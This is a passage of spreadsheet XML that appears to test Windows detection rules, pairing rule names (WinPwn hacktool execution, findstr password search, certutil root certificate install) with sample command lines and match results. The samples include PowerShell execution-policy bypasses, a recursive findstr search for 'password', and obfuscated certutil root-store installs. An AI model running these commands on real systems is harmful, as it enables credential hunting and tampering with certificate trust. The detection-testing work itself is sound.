        </is>
      </c>
      <c r="F1979" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1979" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1979" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1979" s="43" t="n"/>
      <c r="J1979" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1979" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1980" ht="15.75" customHeight="1" s="42">
      <c r="A1980" s="43" t="n"/>
      <c r="B1980" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1980" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1980" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1980" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1980" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1980" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1980" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1980" s="43" t="n"/>
      <c r="J1980" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1980" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1981" ht="15.75" customHeight="1" s="42">
      <c r="A1981" s="43" t="n"/>
      <c r="B1981" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1981" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1981" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1981" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1981" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1981" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1981" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1981" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1981" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1981" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1982" ht="15.75" customHeight="1" s="42">
      <c r="A1982" s="36" t="n"/>
      <c r="B1982" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1982" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1982" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1982" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1982" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1982" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1982" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1982" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1983" ht="15.75" customHeight="1" s="42">
      <c r="A1983" s="36" t="n"/>
      <c r="B1983" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1983" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1983" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1983" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1983" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1983" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1983" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1983" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1983" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1983" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1984" ht="15.75" customHeight="1" s="42">
      <c r="A1984" s="36" t="n"/>
      <c r="B1984" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1984" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1984" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1984" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1984" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1984" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1984" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1984" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1984" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1984" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1985" ht="15.75" customHeight="1" s="42">
      <c r="A1985" s="36" t="n"/>
      <c r="B1985" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1985" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1985" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1985" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1985" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1985" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1985" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1985" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1986" ht="15.75" customHeight="1" s="42">
      <c r="A1986" s="36" t="n"/>
      <c r="B1986" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C1986" s="36" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1986" s="36" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E1986" s="36" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F1986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1986" s="36" t="n"/>
      <c r="J1986" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1986" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1987" ht="15.75" customHeight="1" s="42">
      <c r="A1987" s="36" t="n"/>
      <c r="B1987" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1987" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1987" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1987" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1987" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1987" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1987" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1987" s="36" t="n"/>
      <c r="J1987" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1987" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1988" ht="15.75" customHeight="1" s="42">
      <c r="A1988" s="36" t="n"/>
      <c r="B1988" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1988" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1988" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1988" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1988" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1988" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1988" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1988" s="36" t="n"/>
      <c r="J1988" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1988" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1989" ht="15.75" customHeight="1" s="42">
      <c r="A1989" s="36" t="n"/>
      <c r="B1989" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1989" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1989" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1989" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1989" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1989" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1989" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1989" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1989" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1989" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1990" ht="15.75" customHeight="1" s="42">
      <c r="A1990" s="36" t="n"/>
      <c r="B1990" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1990" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1990" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1990" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1990" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1990" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1990" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1990" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1990" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1990" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1991" ht="15.75" customHeight="1" s="42">
      <c r="A1991" s="36" t="n"/>
      <c r="B1991" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1991" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1991" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1991" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1991" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1991" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1991" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1991" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1992" ht="15.75" customHeight="1" s="42">
      <c r="A1992" s="36" t="n"/>
      <c r="B1992" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1992" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1992" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1992" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1992" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1992" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1992" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1992" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1993" ht="15.75" customHeight="1" s="42">
      <c r="A1993" s="36" t="n"/>
      <c r="B1993" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1993" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1993" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1993" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1993" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1993" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1993" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1993" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1994" ht="15.75" customHeight="1" s="42">
      <c r="A1994" s="36" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B1994" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C1994" s="36" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D1994" s="36" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E1994" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-addstore" root C:\Users\Public\cert.cer</t>
        </is>
      </c>
      <c r="F1994" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1994" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1994" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1994" s="43" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE (d2125259-ddea-4c1c-9c22-977eb5b29cf0)</t>
        </is>
      </c>
      <c r="J1994" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1994" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1995" ht="15.75" customHeight="1" s="42">
      <c r="A1995" s="36" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B1995" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C1995" s="36" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D1995" s="36" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E1995" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c certutil.exe -add^store root C:\Users\Public\cert.cer</t>
        </is>
      </c>
      <c r="F1995" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1995" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1995" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1995" s="36" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE (d2125259-ddea-4c1c-9c22-977eb5b29cf0)</t>
        </is>
      </c>
      <c r="J1995" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1995" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1996" ht="15.75" customHeight="1" s="42">
      <c r="A1996" s="36" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B1996" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C1996" s="36" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D1996" s="36" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E1996" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Public\cert.cer' -CertStoreLocation 'Cert:\LocalMachine\Root'"</t>
        </is>
      </c>
      <c r="F1996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1996" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1996" s="36" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations (5f6a601c-2ecb-498b-9c33-660362323afa); Root Certificate Installed From Susp Locations (5f6a601c-2ecb-498b-9c33-660362323afa)</t>
        </is>
      </c>
      <c r="J1996" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1996" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1997" ht="15.75" customHeight="1" s="42">
      <c r="A1997" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1997" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1997" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1997" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1997" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1997" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1997" s="43" t="n"/>
      <c r="J1997" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1997" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1998" ht="15.75" customHeight="1" s="42">
      <c r="A1998" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1998" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1998" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1998" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1998" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1998" s="36" t="n"/>
      <c r="J1998" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1998" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1999" ht="15.75" customHeight="1" s="42">
      <c r="A1999" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1999" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1999" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1999" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1999" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1999" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1999" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1999" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1999" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2000" ht="15.75" customHeight="1" s="42">
      <c r="A2000" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B2000" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2000" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2000" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2000" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2000" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2000" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2000" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2000" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2001" ht="15.75" customHeight="1" s="42">
      <c r="A2001" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B2001" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2001" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2001" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2001" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2001" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2001" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2001" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2001" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2001" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2001" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2002" ht="15.75" customHeight="1" s="42">
      <c r="A2002" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B2002" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2002" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2002" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2002" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2002" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2002" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2002" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2002" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2003" ht="15.75" customHeight="1" s="42">
      <c r="A2003" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B2003" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2003" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2003" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2003" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2003" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2003" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2003" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2003" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2003" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2003" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2004" ht="15.75" customHeight="1" s="42">
      <c r="A2004" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2004" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2004" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2004" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2004" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F2004" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G2004" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2004" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I2004" s="43" t="n"/>
      <c r="J2004" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K2004" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2005" ht="15.75" customHeight="1" s="42">
      <c r="A2005" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2005" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2005" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2005" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2005" s="36" t="inlineStr">
        <is>
